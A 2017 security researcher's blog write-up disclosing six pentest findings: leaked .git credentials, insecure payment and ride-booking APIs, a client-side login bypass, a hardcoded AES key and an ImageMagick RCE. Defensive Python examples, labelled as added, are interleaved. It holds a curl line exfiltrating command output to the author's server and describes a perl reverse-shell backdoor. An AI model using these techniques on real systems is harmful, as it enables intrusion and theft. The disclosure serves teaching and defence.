
Wednesday, May 24, 2017

Pawning the Web - Disclosing top 6 findings




Hello everyone, this is Shawar Khan, and today I am going to disclose my top 6 findings, which I think were interesting and useful. I am disclosing these so that readers can apply similar methodology and techniques in their own tests. First, I want to let you know that each flaw was reported to the vendors and company owners to prevent the risk, and I am not going to mention the company names, to prevent reputation damage.

The following are covered in this write-up:
  • Hacking the Repository and accessing the Private SMS API
  • Viewing Payment information via Insecure API
  • Hacking into the Wind Turbine Panel
  • Getting AES Key and Decrypting encrypted data
  • Pwning the server having 1 million users with ImageMagick RCE
  • Getting Ride Information of any user

These are the findings that I am going to discuss in this write-up, so let's start!



Hacking the Repository & SMS API

Before we begin, I'd like to give an overview of what was done. While pentesting a web application, after a bit of enumeration, I was able to get into an area holding the repository where all the source code of the web app was available. Through that I hacked into the SMS API, which I will show you in a while. The SMS API was used to send SMS from a specific SMS Mask; it was actually used for sending 2FA/activation codes to mobile numbers from a special SMS Mask.

Let's begin.
When pentesting an application, the most important thing is the information gathering phase: we have to get as much information about the target as possible. Most web developers leave sensitive files on the server because of their uncommon names and so on. Those files are mostly not publicly available, so we have to enumerate to detect them. Similarly, most developers leave the Git directory (.git) behind after cloning a repository. This directory holds information about the Git repo and about all files that were uploaded or deleted. If the Git repository requires authentication, developers sometimes leave their credentials in the config file. A similar thing happened here. First I found the .git directory by enumerating folders:
.GIT Directory Found with Nmap NSE Script

Now, if the .git directory is readable or has directory listing enabled, we can simply run the following command to get all the files available in that directory:
wget -m -I .git http://www.site.com/.git/
Using the above command and then the git status command, we can see all files uploaded to and deleted from the web app. It gives us the whole structure and all hidden files, but what I found was something more interesting. I found that the config file located in the .git directory contained repository credentials. The following information was in the file:
Directory Listing in the .GIT directory

Repository Credentials Leaking in Configuration File

Now that's interesting! I got a new subdomain which was hosting the repository. I could simply clone the entire web app using the git clone command, but first let's visit the new subdomain where the repository was hosted. By using the credentials found, I was able to access their dashboard:
Dashboard Accessed by using the Credentials found
After accessing the dashboard, I got access to multiple repositories, got all the source code and files, and also got access to some sensitive server information like the database password and other things. After digging into it more, I cloned the repository which I guessed held sensitive information. The application seems to use the Laravel PHP framework.
After reviewing each and every file, I found something interesting in the /app/Http/Controllers/Auth/ directory. I found some sensitive information in the source code of a file located there, which seemed to be API information, and after confirmation I found 3 SMS APIs being used along with their credentials:
1st SMS API Information

2nd SMS API Information

3rd SMS API Information
Finally, I found 3 SMS APIs and their credentials. 2 of them were not working, as one of them was deployed in the devices they use. The 3rd API seemed to be working, and it had the same username that I found in the config file at the beginning of the pentest. I tried using the credentials found in the source code, but they did not work as the password was wrong. Bad luck! I tried using the password from the config file and it worked! I guess that was the new password. I accessed the SMS API and was able to send SMS to any number with the "SMS" MSISDN Mask!
SMS Sent via API with "SMS" MSISDN Mask

It wasn't only the SMS API hack; I also found some other serious issues that I didn't mention in this write-up. Just imagine the risk of leaving a file publicly available: due to that 'config' file I was able to access the SMS API. So that's it!
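A deployment-side check for the exposure described in this section, as an added example that is not part of the original write-up: it walks a document root, reports every leftover .git directory, and flags remote URLs in .git/config that embed a password. The host, user name and directory layout in the sample are constructed.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit

URL_LINE = re.compile(r"^\s*(?:push)?url\s*=\s*(\S+)", re.IGNORECASE)

def embedded_credentials(config_text):
    """Return (host, user) for each remote URL in a .git/config that embeds a password."""
    hits = []
    for line in config_text.splitlines():
        match = URL_LINE.match(line)
        if match:
            parts = urlsplit(match.group(1))
            if parts.password:                 # https://user:password@host/... form
                hits.append((parts.hostname, parts.username))
    return hits

def audit_webroot(webroot):
    """Report every .git directory under a deployed document root."""
    findings = []
    for dirpath, dirnames, _ in os.walk(webroot):
        if ".git" in dirnames:
            creds = []
            config = os.path.join(dirpath, ".git", "config")
            if os.path.isfile(config):
                with open(config, encoding="utf-8", errors="replace") as fh:
                    creds = embedded_credentials(fh.read())
            findings.append((os.path.relpath(dirpath, webroot), creds))
            dirnames.remove(".git")            # no need to walk the metadata itself
    return findings

# Constructed sample (not data from the write-up): a leftover clone in public/.
SAMPLE_CONFIG = (
    '[remote "origin"]\n'
    "\turl = https://deploy:EXAMPLE-PASSWORD@git.example.test/team/webapp.git\n"
    "\tfetch = +refs/heads/*:refs/remotes/origin/*\n"
)

def demo():
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "public", ".git"))
        with open(os.path.join(root, "public", ".git", "config"), "w") as fh:
            fh.write(SAMPLE_CONFIG)
        return audit_webroot(root)

if __name__ == "__main__":
    for path, creds in demo():
        print(f"{path}/.git is inside the web root; credentials in remote URLs: {creds}")
```

Any finding means the deployment should ship an export of the tree rather than a clone, and any credential it reports should be rotated.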


Getting Payment Information via Insecure API endpoint

So, here is another interesting discovery. Many people asked me to disclose some API issues, so I decided to disclose an interesting one. In this disclosure, I found an API endpoint where I was able to get information like "Credit Card Number", "Location", "User Information" and all other information that was used in the payment process, and I was also able to get a product for free.

Whenever you are testing for API issues, make sure to get all the endpoints and understand the logic and flow of the application. Once you know the application flow, you will be able to detect API flaws. In this web app, a registration form must be submitted in order to get to the product purchase page. Once the transaction is done, an Order/Transaction ID is sent over an insecure channel via the GET method. The order ID can be stolen easily as it's not securely transferred.

Here is what the registration request looks like:
Registration POST Request to Registration API end point
After the registration, the user is sent to the payment page, after which there is the final page for the receipt. When the payment process is completed, the receipt page sends a request containing the Transaction/Order ID to an API endpoint. The API endpoint was:
https://www.site.com/api/v2/get-lead/ORDER_ID_HERE
A GET request to the endpoint above with the Order ID returns the complete transaction information in JSON:

Transaction Information in JSON form

The 'get-lead' API endpoint shows complete transaction information when a Transaction/Order ID is entered. I tried some different Order IDs that I captured and I was able to get the complete information of their transactions. In the above image the transaction information was for my own order ID, so I used null values to hide the info.
As the information was in JSON, I coded a Python script to automate the flaw and gather the information in a readable form:
Transaction information captured using Python Script

I used test information just to show you how it actually works; the real information was sensitive and can't be shown here publicly. Just by entering an Order ID we can get complete transaction information. That's due to the insecure 'get-lead' API endpoint.



Hacking into the Wind Turbine Panel

I was given the IP address of a Wind Turbine Panel for a penetration test. All I had to do was get into the password-protected panel, which held all the information about the wind turbine. Accessing the IP returned a panel:
Wind Turbine Login Panel
I tried different methods to bypass it and also checked whether it could be bypassed using SQLi, but that didn't work. Sometimes SQLi, response tampering or forced browsing bypasses password-protected areas, but in this case they didn't work, so I tried to understand the flow of the application and how the authentication process was done. Nothing special was found; the panel had a QR code. I tried a QR code reader and it redirected to a mobile panel. I found that there was another panel specially designed for mobile browsers:
The difference between the two panels was that this one was fully based on JS. Each functionality was executed using JavaScript. I started reading the source code of the panel and found a JS file which was handling the login process:
JS File that controls the entire Application

The 'my-app.js' file contained the entire structure of the application behind the panel; as it was based on JS, we can directly call any function. Whenever a similar flow is found, I try to understand how a successful login is forwarded. By doing a code review of the JS file, I tried to understand the response of the application when a valid password is given. The 'logIn()' function is triggered when the credentials are entered; after login, the site responds with a message that tells the JS application whether the login was successful or not. An IF/ELSE condition was deployed, but in an insecure way. The following is the code snippet that was insecure:
Insecure Code Snippet that led to Login Bypass
An IF/ELSE condition was used in the code: if the site responds with "usererror" or "pwderror", the login was not successful and the application executes 'myApp.loginScreen()', which shows the login panel. If the login is successful, the site returns the message "loginSuc" and the application executes the "allStart()" and "myApp.closeModal()" functions. The first function accesses the functionality behind the login panel, and the second closes the login panel and gives access to the dashboard. Time for fun! Let's bypass the panel.
I used invalid credentials to get the site response:
The site responds with a 'usererror' message, which means the login was not successful. Let's change it to a valid response:
I changed the response to 'loginSuc' to fool the application, and we get access to the dashboard. Boom! We got access to the dashboard!
Wind Turbine Speed & Temperature Stats

Wind Turbine Energy Consumption Stats

More Stats about the Turbines
That's it! We accessed the Wind Turbine Panel!
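The fix for this class of flaw is to make the server, not the JS client, decide who may read data. The sketch below is an added example, not the panel's code: the login reply keeps the write-up's message names, but the data endpoint checks a server-signed token on every request, so flipping the message to "loginSuc" only changes which screen the client draws. The account, token format and stats values are constructed.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)          # never leaves the server
# Constructed demo account; a real panel would use a salted password hash store.
USERS = {"operator": hashlib.sha256(b"correct horse").hexdigest()}

def _sign(user):
    return hmac.new(SERVER_KEY, user.encode(), hashlib.sha256).hexdigest()

def login(user, password):
    """Return (message, token). Only a correct password yields a token."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    if user not in USERS:
        return "usererror", None
    if not hmac.compare_digest(USERS[user], digest):
        return "pwderror", None
    return "loginSuc", f"{user}:{_sign(user)}"

def turbine_stats(token):
    """Data endpoint: verifies the token itself, whatever the client believes."""
    user, _, signature = (token or "").partition(":")
    if not user or not hmac.compare_digest(_sign(user), signature):
        return 401, None
    return 200, {"rpm": 14.2, "temp_c": 61}   # constructed sample values

def client_session(user, password, tamper=False):
    """Models the JS client; `tamper` rewrites the login message in transit."""
    message, token = login(user, password)
    if tamper:
        message = "loginSuc"                  # the change described in the write-up
    if message != "loginSuc":
        return "login screen", None
    return "dashboard", turbine_stats(token)  # allStart() would fetch data here
```

With the tampered reply the client still opens the dashboard view, but every data request comes back 401 because no valid token was ever issued.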


 

Getting AES Key and Decrypting encrypted data

When pentesting an Android app, it's important to know how the application communicates with the web app; without that, it's tough to know the communication flow. I intercepted the application traffic and found that the data sent via the 'params' parameter was encrypted:
Encrypted data being sent
Not only the data being sent, but also the response was encrypted:

So, the data being sent and the data received from the web app were both encrypted. There was no way I could decrypt that data. The data was not in plain form, so I was not able to understand how the application was communicating with the web app and what the web app was responding. I tried digging into the application, and before that I decompiled the application using apktool:
apktool d application.apk
I also converted the 'dex' files to 'jar' using dex2jar:
d2j-dex2jar classes.dex
d2j-dex2jar classes2.dex

After decompiling and converting the dex files to jar, I read the jar file using the 'JD-GUI' tool, which is pre-installed in Kali Linux for reading jar files. After checking hundreds of classes available in the 'classes_dex2jar.jar' file, I found a class named 'AuthenticateParentActivity.class' which contained something interesting.

I found the AES key that was used for decrypting and encrypting the data being sent and received! That's what we wanted, and now I was able to decrypt the data being sent and received, which means the communication can be read!
Data successfully decrypted using the key! The key should never be hardcoded in the application or any place that could be accessed by a user. I found some more flaws after decrypting the data, but I guess you've seen the interesting part! That's how I found the AES key and decrypted the data.
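A pre-release check for the mistake described above, as an added example that is not from the original write-up: it scans Java source for key material that would ship inside the APK. The two patterns are heuristics chosen for this illustration, and the sample class is constructed.

```python
import re

# Key material that ends up readable in the decompiled app. These two patterns
# are heuristics for illustration, not a Java parser.
PATTERNS = [
    ("literal passed to SecretKeySpec",
     re.compile(r'new\s+SecretKeySpec\s*\(\s*"[^"]+"\s*\.getBytes')),
    ("string constant named like a key",
     re.compile(r'(?i)\bString\s+\w*(?:key|secret)\w*\s*=\s*"[^"]{8,}"')),
]

def find_hardcoded_keys(java_source):
    """Return [(line_number, reason)] for lines that embed key material."""
    findings = []
    for number, line in enumerate(java_source.splitlines(), start=1):
        for reason, pattern in PATTERNS:
            if pattern.search(line):
                findings.append((number, reason))
                break                          # one finding per line is enough
    return findings

# Constructed sample source (hypothetical class, not the tested app's code).
SAMPLE = '''\
public class SampleActivity {
    private static final String AES_KEY = "0123456789abcdef";
    byte[] encrypt(byte[] data) throws Exception {
        SecretKeySpec spec = new SecretKeySpec(AES_KEY.getBytes(), "AES");
        SecretKeySpec bad = new SecretKeySpec("fedcba9876543210".getBytes(), "AES");
        SecretKey ok = (SecretKey) keyStore.getKey("comms", null);
        return data;
    }
}
'''

if __name__ == "__main__":
    for number, reason in find_hardcoded_keys(SAMPLE):
        print(f"line {number}: {reason}")
```

Line 6 of the sample is not flagged because the key is fetched from a keystore at run time instead of being compiled into the class.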



Pwning the server having 1 million users with ImageMagick RCE

So, here is one of the best RCEs I found; it was in a famous company having almost 1 million users. I was able to get into their servers by exploiting the ImageMagick service being used. When testing for Remote Code Execution or file upload flaws, devs mostly miss some points at image upload areas or profile picture change areas. Similarly in this case, I found an image upload area. When exploiting ImageMagick, we have to create an image containing our command, which will send the reverse connection when a vulnerable function is applied to the image.

But in this case, the commands were not working properly and I was not getting a reverse connection, so I tried executing the curl command with the ImageMagick exploit:
curl http://myserver/$(id)

and the command was executed! I got the output of the 'id' command executed on their server in my Apache logs:


The command was successfully executed, which means the server was vulnerable, but I needed to get a fully interactive shell. I tried executing telnet and bash commands to get a shell, but the reverse shell closed after 2 seconds. That's because the command stops executing once the code executes, so what I did was create 2 files:

One file gets the perl backdoor from my server and the other file executes the perl shell.
I have uploaded both files to my GitHub repo so you can view them:
Launch.png & Make.png

This does each thing separately, which gives a fully interactive shell.
After uploading each file separately, I got the interactive shell! Rooted the server and got maximum privileges, that's it! ImageMagick exploited:
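On the receiving side, an upload handler can refuse files like these before ImageMagick ever sees them. The following is an added example, not code from the write-up or the affected company: it accepts an upload only when its leading bytes match an allowed raster format and the extension agrees, then builds a convert command line with the coder pinned. The work directory and file names are hypothetical.

```python
import os

# Leading bytes of the only formats this upload endpoint accepts.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def sniff_image_type(data):
    """Identify the format from content, never from the client-supplied name."""
    for kind, signatures in MAGIC.items():
        if data.startswith(signatures):
            return kind
    return None

def convert_argv(upload_name, data, workdir="/srv/uploads/tmp"):
    """Return the ImageMagick argv for an accepted upload, or None to reject it."""
    kind = sniff_image_type(data)
    ext = os.path.splitext(upload_name)[1].lower().lstrip(".")
    ext = "jpg" if ext == "jpeg" else ext
    if kind is None or ext != kind:
        return None                      # content is not an allowed raster format
    src = os.path.join(workdir, f"in.{kind}")      # server-chosen name (hypothetical)
    dst = os.path.join(workdir, f"thumb.{kind}")
    # The "png:"-style prefix pins the coder, so ImageMagick does not choose a
    # different, scriptable coder based on what the content looks like.
    return ["convert", f"{kind}:{src}", "-strip", "-thumbnail", "256x256",
            f"{kind}:{dst}"]

# Constructed samples: a PNG header plus padding, and text saved with a .png name.
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
DISGUISED = b"plain text pretending to be an image\n"

if __name__ == "__main__":
    print(convert_argv("avatar.png", REAL_PNG))
    print(convert_argv("Launch.png", DISGUISED))   # rejected: None
```

This check complements keeping ImageMagick patched and disabling unneeded coders in its policy.xml; it does not replace either.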


 

Getting Ride Information of any user

Here is another interesting API issue that I identified in a car service. Every pentest starts with information gathering; by gathering information about the target I found an administrator panel. The admin panel was password protected, but by gathering some information over Bing I found an API endpoint which was showing the location of a ride. The logic of the application is: a user requests a ride and travels to a location. The user gets a special Booking ID. The API endpoint shows the location where the user traveled, taking the Booking ID as input. The endpoint was similar to the following:
If a Booking ID is replaced with the number, it will show the location of the ride taken by a user. This flaw was found by gathering information about the target using Google dorks and Bing. Information gathering is one of the most important phases, and simple techniques can lead to serious risk. I gathered some Booking IDs so I could get some user information:

I coded an exploit for this issue, and by entering a Booking ID the location is captured:

I've uploaded the exploit code to my GitHub so you can see the code: Ride Information Gather Exploit
Just by finding insecure APIs in the target web application we can discover interesting issues. I hope that you guys will love this.
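Both the 'get-lead' endpoint and this booking endpoint return a record to anyone who supplies its ID. The sketch below is an added example, not code from either application: it puts that behaviour next to a lookup that requires the record to belong to the authenticated caller and returns only the fields a receipt needs. The storage, field names and sample data are constructed.

```python
import secrets

class Forbidden(Exception):
    """Raised for missing and foreign records alike, so IDs cannot be probed."""

ORDERS = {}  # order_id -> record; stands in for the database

def create_order(owner, card_number, location):
    order_id = secrets.token_urlsafe(16)       # random, not a guessable counter
    ORDERS[order_id] = {"owner": owner, "card_number": card_number,
                        "location": location}
    return order_id

def get_lead_insecure(order_id):
    """The behaviour described above: knowing an ID is the only requirement."""
    return ORDERS.get(order_id)

def get_lead(session_user, order_id):
    """Hardened lookup: the record must belong to the authenticated caller."""
    record = ORDERS.get(order_id)
    if session_user is None or record is None or record["owner"] != session_user:
        raise Forbidden("order not found")
    return {                                    # only what the receipt page needs
        "order_id": order_id,
        "location": record["location"],
        "card_last4": record["card_number"][-4:],
    }

def demo():
    # Constructed sample data; 4111111111111111 is a well-known test card number.
    order = create_order("alice", "4111111111111111", "Sample City")
    leaked = get_lead_insecure(order)           # any caller gets the full record
    own = get_lead("alice", order)              # the owner gets a minimal record
    try:
        get_lead("mallory", order)
        foreign = "allowed"
    except Forbidden:
        foreign = "denied"
    return leaked["card_number"], own["card_last4"], foreign

if __name__ == "__main__":
    print(demo())
```

Random IDs alone are not enough here, because the write-up shows the ID travelling in a GET request; the ownership check is what stops a captured ID from being useful.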

Thanks for viewing, please share and comment if you like this write-up.

regards,

Shawar Khan
Security Researcher